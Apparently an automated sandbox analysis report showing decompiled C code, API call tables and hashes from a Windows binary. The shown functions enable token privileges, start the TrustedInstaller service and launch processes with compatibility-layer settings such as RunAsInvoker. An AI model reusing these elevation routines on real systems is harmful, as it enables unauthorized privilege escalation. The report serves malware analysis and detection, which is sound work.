				intOrPtr _v12;
				struct _TOKEN_PRIVILEGES _v24;
				void* __esi;
				_Unknown_base(*)()* _t16;
				_Unknown_base(*)()* _t18;
				long _t19;
				_Unknown_base(*)()* _t22;
				_Unknown_base(*)()* _t24;
				struct HINSTANCE__** _t35;
				void* _t37;

				_t37 = __eflags;
				_t35 = __eax;
				if(E00408F92(_t35, _t37, GetCurrentProcess(), 0x28,  &_v8) == 0) {
					return GetLastError();
				}
				_t16 = E00408F72(_t35);
				__eflags = _t16;
				if(_t16 != 0) {
					_t24 = GetProcAddress( *_t35, "LookupPrivilegeValueW");
					__eflags = _t24;
					if(_t24 != 0) {
						LookupPrivilegeValueW(0, _a4,  &(_v24.Privileges)); // executed
					}
				}
				_v24.PrivilegeCount = 1;
				_v12 = 2;
				_a4 = _v8;
				_t18 = E00408F72(_t35);
				__eflags = _t18;
				if(_t18 != 0) {
					_t22 = GetProcAddress( *_t35, "AdjustTokenPrivileges");
					__eflags = _t22;
					if(_t22 != 0) {
						AdjustTokenPrivileges(_a4, 0,  &_v24, 0, 0, 0); // executed
					}
				}
				_t19 = GetLastError();
				FindCloseChangeNotification(_v8); // executed
				return _t19;
			}














                                                                                                                            0x00408fc9
                                                                                                                            0x00408fd0
                                                                                                                            0x00408fe8
                                                                                                                            0x00000000
                                                                                                                            0x00408fea
                                                                                                                            0x00408ff4
                                                                                                                            0x00409001
                                                                                                                            0x00409003
                                                                                                                            0x0040900c
                                                                                                                            0x0040900e
                                                                                                                            0x00409010
                                                                                                                            0x0040901a
                                                                                                                            0x0040901a
                                                                                                                            0x00409010
                                                                                                                            0x0040901f
                                                                                                                            0x00409026
                                                                                                                            0x0040902d
                                                                                                                            0x00409030
                                                                                                                            0x00409035
                                                                                                                            0x00409037
                                                                                                                            0x00409040
                                                                                                                            0x00409042
                                                                                                                            0x00409044
                                                                                                                            0x00409051
                                                                                                                            0x00409051
                                                                                                                            0x00409044
                                                                                                                            0x00409053
                                                                                                                            0x0040905e
                                                                                                                            0x00000000

                                                                                                                            APIs
                                                                                                                            • GetCurrentProcess.KERNEL32(00000028,00000000), ref: 00408FD8
                                                                                                                              • Part of subcall function 00408F92: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 00408FA8
                                                                                                                            • GetLastError.KERNEL32(00000000), ref: 00408FEA
                                                                                                                            • GetProcAddress.KERNEL32(00000000,LookupPrivilegeValueW), ref: 0040900C
                                                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 0040901A
                                                                                                                            • GetProcAddress.KERNEL32(00000000,AdjustTokenPrivileges), ref: 00409040
                                                                                                                            • AdjustTokenPrivileges.KERNELBASE(00000002,00000000,00000001,00000000,00000000,00000000), ref: 00409051
                                                                                                                            • GetLastError.KERNEL32(00000000,00000000,00000000), ref: 00409053
                                                                                                                            • FindCloseChangeNotification.KERNELBASE(00000000), ref: 0040905E
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.428911775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000020.00000002.428878775.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428941026.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428965955.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428985371.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressProc$ErrorLast$AdjustChangeCloseCurrentFindLookupNotificationPrivilegePrivilegesProcessTokenValue
                                                                                                                            • String ID: AdjustTokenPrivileges$LookupPrivilegeValueW
                                                                                                                            • API String ID: 616250965-1253513912
                                                                                                                            • Opcode ID: b5b45514c93916933a35bd7cc4bbde3415ee7f14846a7c37f1b94fb4e6c9eb93
                                                                                                                            • Instruction ID: 03a5dc6c67e2a3af6dad2eaf9b7d3d3c38ee31464385454108c093b6d6cde588
                                                                                                                            • Opcode Fuzzy Hash: b5b45514c93916933a35bd7cc4bbde3415ee7f14846a7c37f1b94fb4e6c9eb93
                                                                                                                            • Instruction Fuzzy Hash: 34114F72500105FFEB10AFF4DD859AF76ADAB44384B10413AF541F2192DA789E449B68
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00401306, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 38serviceCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E00401306(void* _a4) {
				intOrPtr _v28;
				struct _SERVICE_STATUS _v32;
				void* _t5;
				int _t12;
				void* _t14;

				_t12 = 0; // executed
				_t5 = OpenServiceW(_a4, L"TrustedInstaller", 0x34); // executed
				_t14 = _t5;
				if(_t14 != 0) {
					if(QueryServiceStatus(_t14,  &_v32) != 0 && _v28 != 4) {
						_t12 = StartServiceW(_t14, 0, 0);
					}
					CloseServiceHandle(_t14);
				}
				CloseServiceHandle(_a4);
				return _t12;
			}








                                                                                                                            0x00401319
                                                                                                                            0x0040131b
                                                                                                                            0x00401327
                                                                                                                            0x0040132b
                                                                                                                            0x0040133a
                                                                                                                            0x0040134b
                                                                                                                            0x0040134b
                                                                                                                            0x0040134e
                                                                                                                            0x0040134e
                                                                                                                            0x00401353
                                                                                                                            0x0040135b

                                                                                                                            APIs
                                                                                                                            • OpenServiceW.ADVAPI32(00402183,TrustedInstaller,00000034,?,?,00000000,?,?,?,?,?,00402183,00000000), ref: 0040131B
                                                                                                                            • QueryServiceStatus.ADVAPI32(00000000,?,?,?,?,?,?,00402183,00000000), ref: 00401332
                                                                                                                            • StartServiceW.ADVAPI32(00000000,00000000,00000000), ref: 00401345
                                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,00402183,00000000), ref: 0040134E
                                                                                                                            • CloseServiceHandle.ADVAPI32(00402183,?,?,?,?,?,00402183,00000000), ref: 00401353
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.428911775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000020.00000002.428878775.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428941026.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428965955.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428985371.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: Service$CloseHandle$OpenQueryStartStatus
                                                                                                                            • String ID: TrustedInstaller
                                                                                                                            • API String ID: 862991418-565535830
                                                                                                                            • Opcode ID: e275db5ffe703eced9a7585420ea8a7e70def606d9c8162886671e7be63d83f8
                                                                                                                            • Instruction ID: 300c39592a487ff017dde1f9aaf4b69bffecac74e3568357a1b40912e0f2caec
                                                                                                                            • Opcode Fuzzy Hash: e275db5ffe703eced9a7585420ea8a7e70def606d9c8162886671e7be63d83f8
                                                                                                                            • Instruction Fuzzy Hash: F9F08275601218FBE7222BE59CC8DAF7A6CDF88794B040132FD01B12A0D674DD05C9F9
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040A33B, Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E0040A33B(unsigned int _a4, WCHAR* _a8, WCHAR* _a12) {
				struct HRSRC__* _t12;
				void* _t16;
				void* _t17;
				signed int _t18;
				signed int _t26;
				signed int _t29;
				signed int _t33;
				struct HRSRC__* _t35;
				signed int _t36;

				_t12 = FindResourceW(_a4, _a12, _a8); // executed
				_t35 = _t12;
				if(_t35 != 0) {
					_t33 = SizeofResource(_a4, _t35);
					if(_t33 > 0) {
						_t16 = LoadResource(_a4, _t35);
						if(_t16 != 0) {
							_t17 = LockResource(_t16);
							if(_t17 != 0) {
								_a4 = _t33;
								_t29 = _t33 * _t33;
								_t36 = 0;
								_t7 =  &_a4;
								 *_t7 = _a4 >> 2;
								if( *_t7 != 0) {
									do {
										_t26 =  *(_t17 + _t36 * 4) * _t36 * _t33 * 0x00000011 ^  *(_t17 + _t36 * 4) + _t29;
										_t36 = _t36 + 1;
										_t29 = _t26;
									} while (_t36 < _a4);
								}
								_t18 =  *0x40fa70; // 0xfcb617dc
								 *0x40fa70 = _t18 + _t29 ^ _t33;
							}
						}
					}
				}
				return 1;
			}












                                                                                                                            0x0040a348
                                                                                                                            0x0040a34e
                                                                                                                            0x0040a352
                                                                                                                            0x0040a35f
                                                                                                                            0x0040a363
                                                                                                                            0x0040a369
                                                                                                                            0x0040a371
                                                                                                                            0x0040a374
                                                                                                                            0x0040a37c
                                                                                                                            0x0040a380
                                                                                                                            0x0040a383
                                                                                                                            0x0040a386
                                                                                                                            0x0040a388
                                                                                                                            0x0040a388
                                                                                                                            0x0040a38c
                                                                                                                            0x0040a38f
                                                                                                                            0x0040a39f
                                                                                                                            0x0040a3a1
                                                                                                                            0x0040a3a5
                                                                                                                            0x0040a3a5
                                                                                                                            0x0040a3a9
                                                                                                                            0x0040a3aa
                                                                                                                            0x0040a3b3
                                                                                                                            0x0040a3b3
                                                                                                                            0x0040a37c
                                                                                                                            0x0040a371
                                                                                                                            0x0040a3b8
                                                                                                                            0x0040a3be

                                                                                                                            APIs
                                                                                                                            • FindResourceW.KERNELBASE(?,?,?), ref: 0040A348
                                                                                                                            • SizeofResource.KERNEL32(?,00000000), ref: 0040A359
                                                                                                                            • LoadResource.KERNEL32(?,00000000), ref: 0040A369
                                                                                                                            • LockResource.KERNEL32(00000000), ref: 0040A374
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.428911775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000020.00000002.428878775.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428941026.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428965955.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428985371.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: Resource$FindLoadLockSizeof
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3473537107-0
                                                                                                                            • Opcode ID: 92957de205b1cf6ef3f394a564c4f395d7934c53f24f2b06f4a74fbc6cc11166
                                                                                                                            • Instruction ID: cffa73b79ff672a66ed03b266e9253c2cf49bd0e4e2f0a3a12bdb4b298abf715
                                                                                                                            • Opcode Fuzzy Hash: 92957de205b1cf6ef3f394a564c4f395d7934c53f24f2b06f4a74fbc6cc11166
                                                                                                                            • Instruction Fuzzy Hash: 1101C032700315ABCB194FA5DD8995BBFAEFB852913088036ED09EA2A1D730C811CA88
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004022D5, Relevance: 61.7, APIs: 25, Strings: 10, Instructions: 435COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 83%
                                                                                                                            			E004022D5(void* __ecx, void* __edx, void* __eflags, long _a4, long _a8) {
				WCHAR* _v8;
				signed int _v12;
				int _v16;
				int _v20;
				char* _v24;
				int _v28;
				intOrPtr _v32;
				int _v36;
				int _v40;
				char _v44;
				void* _v56;
				int _v60;
				char _v92;
				void _v122;
				int _v124;
				short _v148;
				signed int _v152;
				intOrPtr _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				void _v192;
				char _v196;
				char _v228;
				void _v258;
				int _v260;
				void _v786;
				short _v788;
				void _v1314;
				short _v1316;
				void _v1842;
				short _v1844;
				void _v18234;
				short _v18236;
				char _v83772;
				void* __ebx;
				void* __edi;
				void* __esi;
				short* _t174;
				short _t175;
				signed int _t176;
				short _t177;
				short _t178;
				int _t184;
				signed int _t187;
				intOrPtr _t207;
				intOrPtr _t219;
				int* _t252;
				int* _t253;
				int* _t266;
				int* _t267;
				wchar_t* _t270;
				int _t286;
				void* _t292;
				void* _t304;
				WCHAR* _t308;
				WCHAR* _t310;
				intOrPtr* _t311;
				int _t312;
				WCHAR* _t315;
				void* _t325;
				void* _t328;

				_t304 = __edx;
				E0040B550(0x1473c, __ecx);
				_t286 = 0;
				 *_a4 = 0;
				_v12 = 0;
				_v16 = 0;
				_v20 = 0;
				memset( &_v192, 0, 0x40);
				_v60 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v24 = 0;
				_v40 = 0;
				_v28 = 0;
				_v36 = 0;
				_v32 = 0x100;
				_v44 = 0;
				_v1316 = 0;
				memset( &_v1314, 0, 0x208);
				_v788 = 0;
				memset( &_v786, 0, 0x208);
				_t315 = _a8;
				_t328 = _t325 + 0x24;
				_v83772 = 0;
				_v196 = 0x44;
				E00404923(0x104,  &_v788, _t315);
				if(wcschr(_t315, 0x25) != 0) {
					ExpandEnvironmentStringsW(_t315,  &_v788, 0x104);
				}
				if(_t315[0x2668] != _t286 && wcschr( &_v788, 0x5c) == 0) {
					_v8 = _t286;
					_v1844 = _t286;
					memset( &_v1842, _t286, 0x208);
					_t328 = _t328 + 0xc;
					SearchPathW(_t286,  &_v788, _t286, 0x104,  &_v1844,  &_v8);
					if(_v1844 != _t286) {
						E00404923(0x104,  &_v788,  &_v1844);
					}
				}
				_t308 =  &(_t315[0x2106]);
				if( *_t308 == _t286) {
					E00404B5C( &_v1316,  &_v788);
					__eflags = _v1316 - _t286;
					_t315 = _a8;
					_pop(_t292);
					if(_v1316 == _t286) {
						goto L11;
					}
					goto L10;
				} else {
					_v20 = _t308;
					_t270 = wcschr(_t308, 0x25);
					_pop(_t292);
					if(_t270 == 0) {
						L11:
						_t174 =  &(_t315[0x220e]);
						if( *_t174 != 1) {
							_v152 = _v152 | 0x00000001;
							_v148 =  *_t174;
						}
						_t309 = ",";
						if(_t315[0x2210] != _t286 && _t315[0x2212] != _t286) {
							_v260 = _t286;
							memset( &_v258, _t286, 0x3e);
							_v124 = _t286;
							memset( &_v122, _t286, 0x3e);
							_v8 = _t286;
							E004052F3( &(_t315[0x2212]), _t292,  &_v260, 0x1f,  &_v8, ",");
							E004052F3( &(_t315[0x2212]), _t292,  &_v124, 0x1f,  &_v8, ",");
							_v152 = _v152 | 0x00000004;
							_t266 =  &_v260;
							_push(_t266);
							L0040B1F8();
							_v180 = _t266;
							_t328 = _t328 + 0x3c;
							_t267 =  &_v124;
							L0040B1F8();
							_t292 = _t267;
							_v176 = _t267;
						}
						if(_t315[0x2232] != _t286 && _t315[0x2234] != _t286) {
							_v260 = _t286;
							memset( &_v258, _t286, 0x3e);
							_v124 = _t286;
							memset( &_v122, _t286, 0x3e);
							_v8 = _t286;
							E004052F3( &(_t315[0x2234]), _t292,  &_v260, 0x1f,  &_v8, _t309);
							E004052F3( &(_t315[0x2234]), _t292,  &_v124, 0x1f,  &_v8, _t309);
							_v152 = _v152 | 0x00000002;
							_t252 =  &_v260;
							_push(_t252);
							L0040B1F8();
							_v172 = _t252;
							_t328 = _t328 + 0x3c;
							_t253 =  &_v124;
							_push(_t253);
							L0040B1F8();
							_v168 = _t253;
						}
						_t310 =  &(_t315[0x105]);
						if( *_t310 != _t286) {
							if(_t315[0x266a] == _t286 || wcschr(_t310, 0x25) == 0) {
								_push(_t310);
							} else {
								_v18236 = _t286;
								memset( &_v18234, _t286, 0x4000);
								_t328 = _t328 + 0xc;
								ExpandEnvironmentStringsW(_t310,  &_v18236, 0x2000);
								_push( &_v18236);
							}
							_push( &_v788);
							_push(L"\"%s\" %s");
							_push(0x7fff);
							_push( &_v83772);
							L0040B1EC();
							_v24 =  &_v83772;
						}
						_t175 = _t315[0x220c];
						if(_t175 != 0x20) {
							_v12 = _t175;
						}
						_t311 = _a4;
						if(_t315[0x2254] == 2) {
							E00401D1E(_t311, L"RunAsInvoker");
						}
						_t176 = _t315[0x265c];
						if(_t176 != _t286 && _t176 - 1 <= 0xc) {
							E00401D1E(_t311,  *((intOrPtr*)(0x40f2a0 + _t176 * 4)));
						}
						_t177 = _t315[0x265e];
						if(_t177 != 1) {
							__eflags = _t177 - 2;
							if(_t177 != 2) {
								goto L37;
							}
							_push(L"16BITCOLOR");
							goto L36;
						} else {
							_push(L"256COLOR");
							L36:
							E00401D1E(_t311);
							L37:
							if(_t315[0x2660] == _t286) {
								__eflags = _t315[0x2662] - _t286;
								if(_t315[0x2662] == _t286) {
									__eflags = _t315[0x2664] - _t286;
									if(_t315[0x2664] == _t286) {
										__eflags = _t315[0x2666] - _t286;
										if(_t315[0x2666] == _t286) {
											L46:
											_t178 = _t315[0x2a6e];
											_t358 = _t178 - 3;
											if(_t178 != 3) {
												__eflags = _t178 - 2;
												if(_t178 != 2) {
													__eflags =  *_t311 - _t286;
													if( *_t311 == _t286) {
														_push(_t286);
													} else {
														_push(_t311);
													}
													SetEnvironmentVariableW(L"__COMPAT_LAYER", ??);
													L63:
													_t293 = _t311;
													_t184 = E00401FE6(_t315, _t311, _t304,  &_v788, _v24, _v12, _v16, _v20,  &_v196,  &_v60); // executed
													_t312 = _t184;
													if(_t312 == _t286 && _v60 != _t286) {
														_t363 = _t315[0x266c] - _t286;
														if(_t315[0x266c] != _t286) {
															_t187 = E00401A3F(_t293, _t363,  &(_t315[0x266e]));
															_a4 = _a4 | 0xffffffff;
															_a8 = _t286;
															GetProcessAffinityMask(_v60,  &_a8,  &_a4);
															_t184 = SetProcessAffinityMask(_v60, _a4 & _t187);
														}
													}
													E004055D1(_t184,  &_v44);
													return _t312;
												}
												E00405497( &_v92);
												E00405497( &_v228);
												E0040149F(__eflags,  &_v92);
												E0040135C(E004055EC( &(_t315[0x2a70])), __eflags,  &_v228);
												E00401551( &_v228, _t304, __eflags,  &_v92);
												_t204 = _a4;
												__eflags =  *_a4;
												if(__eflags != 0) {
													E004014E9( &_v92, _t304, __eflags,  &_v92, _t204);
												}
												E00401421( &_v44, _t304,  &_v92, __eflags);
												_t207 = _v28;
												__eflags = _t207;
												_v16 = 0x40c4e8;
												if(_t207 != 0) {
													_v16 = _t207;
												}
												_v12 = _v12 | 0x00000400;
												E004054B9( &_v228);
												E004054B9( &_v92);
												_t286 = 0;
												__eflags = 0;
												L58:
												_t315 = _a8;
												_t311 = _a4;
												goto L63;
											}
											E00405497( &_v92);
											E0040135C(E004055EC( &(_t315[0x2a70])), _t358,  &_v92);
											_t359 =  *_t311 - _t286;
											if( *_t311 != _t286) {
												E004014E9( &_v92, _t304, _t359,  &_v92, _t311);
											}
											E00401421( &_v44, _t304,  &_v92, _t359);
											_t219 = _v28;
											_v16 = 0x40c4e8;
											if(_t219 != _t286) {
												_v16 = _t219;
											}
											_v12 = _v12 | 0x00000400;
											E004054B9( &_v92);
											goto L58;
										}
										_push(L"HIGHDPIAWARE");
										L45:
										E00401D1E(_t311);
										goto L46;
									}
									_push(L"DISABLEDWM");
									goto L45;
								}
								_push(L"DISABLETHEMES");
								goto L45;
							}
							_push(L"640X480");
							goto L45;
						}
					}
					ExpandEnvironmentStringsW(_t308,  &_v1316, 0x104);
					L10:
					_v20 =  &_v1316;
					goto L11;
				}
			}

































































                                                                                                                            0x004022d5
                                                                                                                            0x004022dd
                                                                                                                            0x004022e7
                                                                                                                            0x004022ec
                                                                                                                            0x004022f7
                                                                                                                            0x004022fa
                                                                                                                            0x004022fd
                                                                                                                            0x00402300
                                                                                                                            0x00402307
                                                                                                                            0x0040230d
                                                                                                                            0x0040230e
                                                                                                                            0x00402318
                                                                                                                            0x00402321
                                                                                                                            0x00402324
                                                                                                                            0x00402327
                                                                                                                            0x0040232a
                                                                                                                            0x0040232d
                                                                                                                            0x00402334
                                                                                                                            0x00402337
                                                                                                                            0x0040233e
                                                                                                                            0x0040234f
                                                                                                                            0x00402356
                                                                                                                            0x0040235b
                                                                                                                            0x0040235e
                                                                                                                            0x0040236d
                                                                                                                            0x00402374
                                                                                                                            0x0040237e
                                                                                                                            0x00402395
                                                                                                                            0x004023a0
                                                                                                                            0x004023a0
                                                                                                                            0x004023ac
                                                                                                                            0x004023cf
                                                                                                                            0x004023d2
                                                                                                                            0x004023d9
                                                                                                                            0x004023de
                                                                                                                            0x004023f6
                                                                                                                            0x00402403
                                                                                                                            0x00402414
                                                                                                                            0x00402419
                                                                                                                            0x00402403
                                                                                                                            0x0040241a
                                                                                                                            0x00402423
                                                                                                                            0x00402458
                                                                                                                            0x0040245d
                                                                                                                            0x00402464
                                                                                                                            0x00402467
                                                                                                                            0x00402468
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00402425
                                                                                                                            0x00402428
                                                                                                                            0x0040242b
                                                                                                                            0x00402433
                                                                                                                            0x00402434
                                                                                                                            0x00402473
                                                                                                                            0x00402473
                                                                                                                            0x0040247c
                                                                                                                            0x00402481
                                                                                                                            0x00402488
                                                                                                                            0x00402488
                                                                                                                            0x00402495
                                                                                                                            0x0040249a
                                                                                                                            0x004024b7
                                                                                                                            0x004024be
                                                                                                                            0x004024cd
                                                                                                                            0x004024d1
                                                                                                                            0x004024ed
                                                                                                                            0x004024f0
                                                                                                                            0x00402506
                                                                                                                            0x0040250b
                                                                                                                            0x00402512
                                                                                                                            0x00402518
                                                                                                                            0x00402519
                                                                                                                            0x0040251e
                                                                                                                            0x00402524
                                                                                                                            0x00402527
                                                                                                                            0x0040252b
                                                                                                                            0x00402530
                                                                                                                            0x00402531
                                                                                                                            0x00402531
                                                                                                                            0x0040253d
                                                                                                                            0x0040255a
                                                                                                                            0x00402561
                                                                                                                            0x00402570
                                                                                                                            0x00402574
                                                                                                                            0x00402590
                                                                                                                            0x00402593
                                                                                                                            0x004025a9
                                                                                                                            0x004025ae
                                                                                                                            0x004025b5
                                                                                                                            0x004025bb
                                                                                                                            0x004025bc
                                                                                                                            0x004025c1
                                                                                                                            0x004025c7
                                                                                                                            0x004025ca
                                                                                                                            0x004025cd
                                                                                                                            0x004025ce
                                                                                                                            0x004025d4
                                                                                                                            0x004025d4
                                                                                                                            0x004025da
                                                                                                                            0x004025e3
                                                                                                                            0x004025eb
                                                                                                                            0x00402633
                                                                                                                            0x004025fb
                                                                                                                            0x00402608
                                                                                                                            0x0040260f
                                                                                                                            0x00402614
                                                                                                                            0x00402624
                                                                                                                            0x00402630
                                                                                                                            0x00402630
                                                                                                                            0x0040263a
                                                                                                                            0x0040263b
                                                                                                                            0x00402646
                                                                                                                            0x0040264b
                                                                                                                            0x0040264c
                                                                                                                            0x0040265a
                                                                                                                            0x0040265a
                                                                                                                            0x0040265d
                                                                                                                            0x00402666
                                                                                                                            0x00402668
                                                                                                                            0x00402668
                                                                                                                            0x00402672
                                                                                                                            0x00402675
                                                                                                                            0x0040267e
                                                                                                                            0x0040267e
                                                                                                                            0x00402683
                                                                                                                            0x0040268b
                                                                                                                            0x0040269e
                                                                                                                            0x0040269e
                                                                                                                            0x004026a3
                                                                                                                            0x004026ac
                                                                                                                            0x004026b5
                                                                                                                            0x004026b8
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x004026ba
                                                                                                                            0x00000000
                                                                                                                            0x004026ae
                                                                                                                            0x004026ae
                                                                                                                            0x004026bf
                                                                                                                            0x004026c1
                                                                                                                            0x004026c6
                                                                                                                            0x004026cc
                                                                                                                            0x004026d5
                                                                                                                            0x004026db
                                                                                                                            0x004026e4
                                                                                                                            0x004026ea
                                                                                                                            0x004026f3
                                                                                                                            0x004026f9
                                                                                                                            0x00402707
                                                                                                                            0x00402707
                                                                                                                            0x0040270d
                                                                                                                            0x00402710
                                                                                                                            0x0040276d
                                                                                                                            0x00402770
                                                                                                                            0x0040280b
                                                                                                                            0x0040280e
                                                                                                                            0x00402813
                                                                                                                            0x00402810
                                                                                                                            0x00402810
                                                                                                                            0x00402810
                                                                                                                            0x00402819
                                                                                                                            0x0040281f
                                                                                                                            0x00402836
                                                                                                                            0x00402841
                                                                                                                            0x00402846
                                                                                                                            0x0040284a
                                                                                                                            0x00402851
                                                                                                                            0x00402857
                                                                                                                            0x00402860
                                                                                                                            0x00402865
                                                                                                                            0x00402876
                                                                                                                            0x00402879
                                                                                                                            0x00402888
                                                                                                                            0x00402888
                                                                                                                            0x00402857
                                                                                                                            0x00402891
                                                                                                                            0x0040289c
                                                                                                                            0x0040289c
                                                                                                                            0x00402779
                                                                                                                            0x00402784
                                                                                                                            0x0040278d
                                                                                                                            0x004027a4
                                                                                                                            0x004027b3
                                                                                                                            0x004027b8
                                                                                                                            0x004027bb
                                                                                                                            0x004027bf
                                                                                                                            0x004027c6
                                                                                                                            0x004027c6
                                                                                                                            0x004027d1
                                                                                                                            0x004027d6
                                                                                                                            0x004027d9
                                                                                                                            0x004027db
                                                                                                                            0x004027e2
                                                                                                                            0x004027e4
                                                                                                                            0x004027e4
                                                                                                                            0x004027e7
                                                                                                                            0x004027f4
                                                                                                                            0x004027fc
                                                                                                                            0x00402801
                                                                                                                            0x00402801
                                                                                                                            0x00402803
                                                                                                                            0x00402803
                                                                                                                            0x00402806
                                                                                                                            0x00000000
                                                                                                                            0x00402806
                                                                                                                            0x00402715
                                                                                                                            0x00402729
                                                                                                                            0x0040272e
                                                                                                                            0x00402731
                                                                                                                            0x00402738
                                                                                                                            0x00402738
                                                                                                                            0x00402743
                                                                                                                            0x00402748
                                                                                                                            0x0040274d
                                                                                                                            0x00402754
                                                                                                                            0x00402756
                                                                                                                            0x00402756
                                                                                                                            0x00402759
                                                                                                                            0x00402763
                                                                                                                            0x00000000
                                                                                                                            0x00402763
                                                                                                                            0x004026fb
                                                                                                                            0x00402700
                                                                                                                            0x00402702
                                                                                                                            0x00000000
                                                                                                                            0x00402702
                                                                                                                            0x004026ec
                                                                                                                            0x00000000
                                                                                                                            0x004026ec
                                                                                                                            0x004026dd
                                                                                                                            0x00000000
                                                                                                                            0x004026dd
                                                                                                                            0x004026ce
                                                                                                                            0x00000000
                                                                                                                            0x004026ce
                                                                                                                            0x004026ac
                                                                                                                            0x00402443
                                                                                                                            0x0040246a
                                                                                                                            0x00402470
                                                                                                                            0x00000000
                                                                                                                            0x00402470

                                                                                                                            APIs
                                                                                                                            • memset.MSVCRT ref: 00402300
                                                                                                                            • memset.MSVCRT ref: 0040233E
                                                                                                                            • memset.MSVCRT ref: 00402356
                                                                                                                              • Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
                                                                                                                              • Part of subcall function 00404923: memcpy.MSVCRT ref: 00404940
                                                                                                                            • wcschr.MSVCRT ref: 00402387
                                                                                                                            • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 004023A0
                                                                                                                              • Part of subcall function 00404B5C: wcscpy.MSVCRT ref: 00404B61
                                                                                                                              • Part of subcall function 00404B5C: wcsrchr.MSVCRT ref: 00404B69
                                                                                                                            • wcschr.MSVCRT ref: 004023B7
                                                                                                                            • memset.MSVCRT ref: 004023D9
                                                                                                                            • SearchPathW.KERNEL32(00000000,?,00000000,00000104,?,?,?,?,?,?,?,?,?,?,00000208), ref: 004023F6
                                                                                                                            • wcschr.MSVCRT ref: 0040242B
                                                                                                                            • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 00402443
                                                                                                                            • memset.MSVCRT ref: 004024BE
                                                                                                                            • memset.MSVCRT ref: 004024D1
                                                                                                                            • _wtoi.MSVCRT ref: 00402519
                                                                                                                            • _wtoi.MSVCRT ref: 0040252B
                                                                                                                            • memset.MSVCRT ref: 00402561
                                                                                                                            • memset.MSVCRT ref: 00402574
                                                                                                                            • _wtoi.MSVCRT ref: 004025BC
                                                                                                                            • _wtoi.MSVCRT ref: 004025CE
                                                                                                                            • wcschr.MSVCRT ref: 004025F0
                                                                                                                            • memset.MSVCRT ref: 0040260F
                                                                                                                            • ExpandEnvironmentStringsW.KERNEL32(?,?,00002000,?,?,?,?,?,?,?,?,00000208), ref: 00402624
                                                                                                                            • _snwprintf.MSVCRT ref: 0040264C
                                                                                                                            • SetEnvironmentVariableW.KERNEL32(__COMPAT_LAYER,00000000), ref: 00402819
                                                                                                                            • GetProcessAffinityMask.KERNEL32 ref: 00402879
                                                                                                                            • SetProcessAffinityMask.KERNEL32 ref: 00402888
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.428911775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000020.00000002.428878775.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428941026.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428965955.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428985371.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: memset$Environment_wtoiwcschr$ExpandStrings$AffinityMaskProcess$PathSearchVariable_snwprintfmemcpywcscpywcslenwcsrchr
                                                                                                                            • String ID: "%s" %s$16BITCOLOR$256COLOR$640X480$D$DISABLEDWM$DISABLETHEMES$HIGHDPIAWARE$RunAsInvoker$__COMPAT_LAYER
                                                                                                                            • API String ID: 2452314994-435178042
                                                                                                                            • Opcode ID: 067d403336562cb18e4ef95dc35e81972e5343f3ed9e099bed5cf17b41ec62b0
                                                                                                                            • Instruction ID: b54a7db1e05dda42e7bfc3830e2036fe484084dd7c1f23c6c807eede0ded9d8d
